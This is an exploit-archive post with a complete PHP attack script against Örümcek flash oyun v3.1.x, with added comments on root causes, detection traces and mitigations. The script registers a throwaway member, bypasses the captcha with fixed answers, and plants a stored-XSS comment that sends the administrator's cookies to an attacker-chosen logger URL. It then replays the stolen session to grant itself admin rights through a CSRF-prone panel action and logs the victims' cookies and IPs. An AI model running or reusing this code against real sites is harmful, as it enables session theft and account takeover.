# Exploit Title: Örümcek flash oyun v3.1.1 & v3.1.0 XSS & CSRF Vulnerability
# Google Dork: ©2010 - 2013 cretsiz Flash Oyun Scripti kullanılarak hazırlanmıtır.
# Date: 08.06.2013
# Exploit Author: FreWaL | frewal@frewal.net
# Vendor Homepage: http://www.orumcekoyun.com/
# Software Link: http://orumcekoyun.com/surumler.html
# Version: v3.1.1(latest) & v3.1.0
##########################################################
# Exploit Video : http://www.youtube.com/watch?v=mu4uFBhhv68&feature=youtu.be
##########################################################
# Dr.Ly0n & FreWaL --> http://frewals.blogspot.com
##########################################################
Create a file named yazdim.html and set its permissions with chmod 777.
What the exploit does:
it automatically registers on the website, automatically creates the exploit and automatically sends it to the admin.
It works as both an exploit and a sniffer. Please watch the exploit video.
##########################################################
Bir dosya olusturun ve adini : yazdim.html yapin chmod 777 verin.
Bu exploitin islevi
otomatik kayit olur otomatik exploiti olusturur ve admine gonderir.
bu hem exploit hemde sniffer gorevi gorur. Lutfen exploit videosunu izleyiniz.
##########################################################
This is the gir.php exploit shown in the video:
<?php
/*
Coded by FreWaL & Dr.Ly0n
For Angelz Co.
http://frewals.blogspot.com
*/
// Request parsing shared by both roles of this script: the collector
// (when `fw` is present) and the PoC driver form (when `u1`/`u2` are present).
// None of the reads below is guarded with isset(), so a request that lacks a
// parameter, or an `fw` value with fewer segments than expected, hits
// undefined array keys.
//
// `fw` is what the injected comment script sends back. As built by
// exploitUygula() it has the layout
//   escape(document.URL) | escape(document.cookie) & kidi=<member id> & kadi=<login name>
$cookie = $_GET['fw'];
// Target site and collector URL typed into the form at the bottom of the file.
$u1 = $_GET['u1'];
$u2 = $_GET['u2'];
// Address of the client that loaded the hidden iframe.
$ip = $_SERVER['REMOTE_ADDR'];
// Split the report into its three '&'-separated segments.
$ilk = explode('&',$cookie);
$sonx = $ilk[1];   // "kidi=<member id>" segment
$son1 = $ilk[2];   // "kadi=<login name>" segment
// First segment, decoded: [0] = page URL the script ran on, [1] = document.cookie.
$bolbi = explode("|",urldecode($ilk[0]));
// Host part of the reporting page URL; used later as the de-duplication key.
// Only "http://" is handled, so an https page URL leaves $tamurl[1] unset.
$tamurl = explode("http://",$bolbi[0]);
$tamurlx = explode("/",$tamurl[1]);
$tamurlz = $tamurlx[0];
// Member id taken from the "kidi=<id>" segment.
$kids = explode("=",$sonx);
$kidi = $kids[1];
// Everything in the page URL before the first "panel", i.e. the install's base
// URL when the script executed inside the admin panel.
$ozbo = explode("panel",$bolbi[0]);
$sifirURL = trim($ozbo[0]);
// Default value shown in the "Logger URL" form field (always empty here).
$loggerURLz = '';
/**
 * PoC driver: registers a throwaway member on the target install, logs in as
 * that member and posts a game comment whose body carries a script.
 *
 * What the code below does, in order:
 *  1. Probes for /panel/js/tiny_mce/tiny_mce.js to decide whether the install
 *     is a version this PoC applies to.
 *  2. POSTs the registration form, then the login form, and reads
 *     ORUMCEK_MEMBER_ID and ORUMCEK_HASH out of the login response headers.
 *  3. POSTs a comment (uye/uyeislem.php) containing a hidden iframe plus a
 *     script that sends document.URL and document.cookie to $logURL.
 *
 * Defender notes (root causes, inferred from what this PoC relies on and to be
 * confirmed against the application source):
 *  - The comment body is presumably stored and later rendered without output
 *    encoding or HTML sanitisation wherever an administrator views it.
 *  - The session cookies are read through document.cookie, so they are
 *    presumably issued without the HttpOnly flag.
 *  - The captcha answers are hard-coded constants (40 and 7), which suggests
 *    the captcha is not validated server-side or is predictable.
 *  - The cookie set includes ORUMCEK_PASSWD = md5(password), i.e. the
 *    application appears to keep an unsalted MD5 of the password in a cookie.
 *
 * Log artefacts visible in this code that can be used for detection: the fixed
 * Firefox/3.0.6 "tr" User-Agent on every request, registrations with user name
 * "ayse" + three digits and a matching @hotmail.com address, and comments
 * containing an iframe with id "iframe_ooyun".
 *
 * @param string $getirverbaga Target host (and optional path) without scheme;
 *                             comes straight from the `u1` query parameter.
 * @param string $logURL       Collector URL embedded in the posted script;
 *                             comes straight from the `u2` query parameter.
 * @return void Nothing is returned; status text is echoed.
 */
function exploitUygula($getirverbaga, $logURL){
// Version probe: the file is opened over HTTP (needs allow_url_fopen); the
// '@' hides the warning when the file is absent.
$dosya = 'http://'.$getirverbaga.'/panel/js/tiny_mce/tiny_mce.js';
$kontrol = @fopen($dosya , "r");
if ($kontrol) {
// Throwaway account: "ayse" + 3 random digits, fixed password.
$rakam = rand(100,999);
$kadi = 'ayse'.$rakam ;
$mail = 'ayse'.$rakam.'%40hotmail.com';
$pass = 'frewal';
// Step 1: member registration. The captcha field is sent as the constant 40.
$fwdr1 = curl_init();
curl_setopt($fwdr1, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=register');
curl_setopt($fwdr1, CURLOPT_POSTFIELDS,'isim=Ayse&soyisim=Sonmez&gun=1&ay=1&yil=1992&email='.$mail.'&kadi='.$kadi.'&password='.$pass.'&cpassword='.$pass.'&capchacevap=40&Submit=Kabul+%2F+%C3%9Cye+Ol');
curl_setopt($fwdr1, CURLOPT_POST, 1);
curl_setopt($fwdr1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdr1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdr1, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/index.php?do=register');
curl_setopt($fwdr1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdr1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdr1, CURLOPT_SSL_VERIFYHOST, 0);
// The registration response is captured but never inspected.
$uyelik=curl_exec($fwdr1);
curl_close($fwdr1);
// Step 2: log in as the new member. CURLOPT_HEADER is enabled so that the
// Set-Cookie headers end up in the returned string.
$postx = 'kadi='.$kadi.'&password='.$pass.'&Submit=G%C4%B0R%C4%B0%C5%9E+YAP';
$fwdr2 = curl_init();
curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=login');
//curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/do-login.php?kadi='.$kadi.'&sifre='.$pass.'');
curl_setopt($fwdr2, CURLOPT_POSTFIELDS,$postx);
curl_setopt($fwdr2, CURLOPT_POST, 1);
curl_setopt($fwdr2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdr2, CURLOPT_HEADER, 1);
curl_setopt($fwdr2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdr2, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/do-login.php');
curl_setopt($fwdr2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdr2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdr2, CURLOPT_SSL_VERIFYHOST, 0);
$uyelik1=curl_exec($fwdr2);
curl_close($fwdr2);
//echo $uyelik1.'<br>';
// Pull the member id and session hash out of the raw response by string
// splitting: the text after the last "NAME=" up to the next ';'.
$ids = explode("ORUMCEK_MEMBER_ID=",$uyelik1);
$soid = explode(";",end($ids));
$hashi = explode("ORUMCEK_HASH=",$uyelik1);
$hashi1 = explode(";",end($hashi));
// Rebuild the full cookie set by hand. ORUMCEK_PASSWD is the MD5 of the
// plaintext password and ORUMCEK_ADMIN is a client-side "0"/"1" style flag.
// NOTE(review): whether the server trusts ORUMCEK_ADMIN from the cookie is not
// visible here; if it does, that is a separate authorisation flaw.
$ORUMCEK_MEMBER_ID = trim($soid[0]);
$ORUMCEK_ADMIN = '0';
$ORUMCEK_LOGIN_NAME = $kadi;
$ORUMCEK_HASH = trim($hashi1[0]);
$ORUMCEK_PASSWD = md5($pass);
$cookies = 'ORUMCEK_MEMBER_ID='.$ORUMCEK_MEMBER_ID.'; ORUMCEK_ADMIN='.$ORUMCEK_ADMIN.'; ORUMCEK_LOGIN_NAME='.$ORUMCEK_LOGIN_NAME.'; ORUMCEK_HASH='.$ORUMCEK_HASH.'; ORUMCEK_PASSWD='.$ORUMCEK_PASSWD.'';
// Status output; the message is printed before the comment request below is
// actually sent.
echo $cookies.'<br>';
echo '-> islem tamamlandi !! -> complete!!';
// Step 3: the comment body (URL-encoded). Decoded, it is an innocuous-looking
// paragraph, a display:none div holding an iframe with id "iframe_ooyun", and
// a script that sets the iframe src to
//   $logURL?fw= + escape(document.URL | document.cookie & kidi=<id> & kadi=<name>)
// "yorumotomatikonay=0" is sent with the comment, presumably leaving it queued
// for moderation so that it is rendered in the admin panel.
// Mitigation on the application side: encode or sanitise comment HTML on
// output, and mark session cookies HttpOnly so script cannot read them.
$postverisi = 'yorumekle=yorumekle&oyunid=1&yorumotomatikonay=0&capchacevap=7&yorum=%3Cp%3EBence+s%26uuml%3Bper+oyun+herkese+tavsiye+ediyorum!+te%C5%9Fekk%26uuml%3Brler+admin...%3C%2Fp%3E%0D%0A%3Cdiv+style%3D%22display%3A+none%3B%22%3E%3Ciframe+id%3D%22iframe_ooyun%22+frameborder%3D%22100%22+scrolling%3D%22no%22+width%3D%220%22+height%3D%220%22%3E%3C%2Fiframe%3E%3C%2Fdiv%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C!%5BCDATA%5B%0D%0Avar++urlMbenim+%3D+%22'.$logURL.'%3Ffw%3D%22%3B%0D%0A%09var+data+%3D+escape(document.URL)+%2B+%22%7C%22+%2B+escape(document.cookie)+%2B+%22%26kidi%3D'.$ORUMCEK_MEMBER_ID.'%26kadi%3D'.$ORUMCEK_LOGIN_NAME.'%22%3B%0D%0A++++document.getElementById(%22iframe_ooyun%22).src+%3D+urlMbenim+%2B+escape(data)%3B%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E';
$fwdrsn = curl_init();
curl_setopt($fwdrsn, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/uyeislem.php');
curl_setopt($fwdrsn, CURLOPT_POSTFIELDS,$postverisi);
curl_setopt($fwdrsn, CURLOPT_POST, 1);
curl_setopt($fwdrsn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdrsn, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdrsn, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/uyeislem.php');
// The hand-built member cookie is sent as a raw header.
curl_setopt($fwdrsn, CURLOPT_HTTPHEADER, array("Content-Type: application/x-www-form-urlencoded; charset=UTF-8","Cookie: $cookies"));
curl_setopt($fwdrsn, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYHOST, 0);
// The response is stored but not checked, so success is never verified.
$gelss=curl_exec($fwdrsn);
curl_close($fwdrsn);
#################################
} else {
// Probe failed: tiny_mce.js was not reachable at the expected path.
echo "Bu versiyon bu acik icin uyumlu degildir !! , This version is not compatible to the open";
}
#################################
}
// Dispatcher for the two roles of the script.
//
// Branch 1 (`fw` present): collector. It receives the report sent by the
// injected comment script and, the first time a given host reports in, replays
// the captured cookie against the panel's "make member admin" action.
// Branch 2 (`fw` absent): prints the operator form.
//
// Defender notes: the replay below is a plain GET carrying only a Cookie
// header. As used here, /panel/islemler.php?islem=uye_admin&uyeid=<id> appears
// to change privileges on a GET request with no anti-CSRF token and no
// re-authentication, and the session appears usable from a different client
// than the one it was issued to; confirm against the application source.
// Application-side mitigations: HttpOnly session cookies, POST plus a
// per-session token for state-changing panel actions, and re-authentication
// for privilege changes. In access logs, a uye_admin request from an address
// other than the administrator's, with the fixed Firefox/3.0.6 User-Agent, is
// the trace of this step.
if($cookie != ""){
// De-duplication: skip hosts that already appear in the log file.
$gelss = file_get_contents('yazdim.html');
if(strstr($gelss,$tamurlz)){
//echo 'var';
}else{
// Replay of the captured cookie ($bolbi[1]) against the panel action, asking
// it to promote member id $kidi.
$fwdr = curl_init();
curl_setopt($fwdr, CURLOPT_URL, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.'');
curl_setopt($fwdr, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)");
curl_setopt($fwdr, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($fwdr, CURLOPT_REFERER, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.'');
curl_setopt($fwdr, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded','Cookie: '.trim($bolbi[1]).''));
curl_setopt($fwdr, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($fwdr, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($fwdr, CURLOPT_SSL_VERIFYHOST, 0);
// The response is stored but never examined.
$gel=curl_exec($fwdr);
curl_close($fwdr);
// Append the captured cookie, page URL, member id/name and client IP to the
// HTML log. NOTE(review): all of these values come from the unauthenticated
// request and are written without HTML escaping, and the handle is never
// closed with fclose().
$frewalgelen=fopen("yazdim.html","a");
fwrite($frewalgelen,'<hr color=#000000;>
<u><font face="verdana" size="-2">Cookiler
</font></u><font face=verdana size=-2>
<u>:</u> <b>'.$bolbi[1].'</b><br>
<u>Site
:</u> <b>'.$bolbi[0].'</b></br>
<u>Senin Ekledigin Admin
:</u> <b>Your UserID-UserName->'.$sonx.'-'.$son1.' Default Sifre( Password ) : frewal</b></br>
<u>IP Adresi :</u> <b>'.$ip.'</b><br>
<hr color=#000000;>
</font>');
}
}else{
// No report in the request: show the form that collects the target site (u1)
// and collector URL (u2) and submits them back to this script via GET.
echo '
<br>ornek hedef / sample viktim : www.google.com/orumcekoyunpath<br>
<br>ornek log dosyasi / sample LogURL : http://asdf.com/log.php<br>
<form method="GET" action="">
<p>Victim Site : <input type="text" name="u1" value="" size="47"></p>
<p>Logger URL :<input type="text" name="u2" value="'.$loggerURLz.'" size="47"></p>
<p><input type="submit" value="Pompala | Sennnnddd :))" name="B1"></p>
</form>
';
}
// Form submitted: run the driver. exploitUygula() has no return statement, so
// this echo itself prints nothing; the visible output comes from the echoes
// inside the function.
if($u1 != ""){
echo exploitUygula($u1, $u2);
}
?>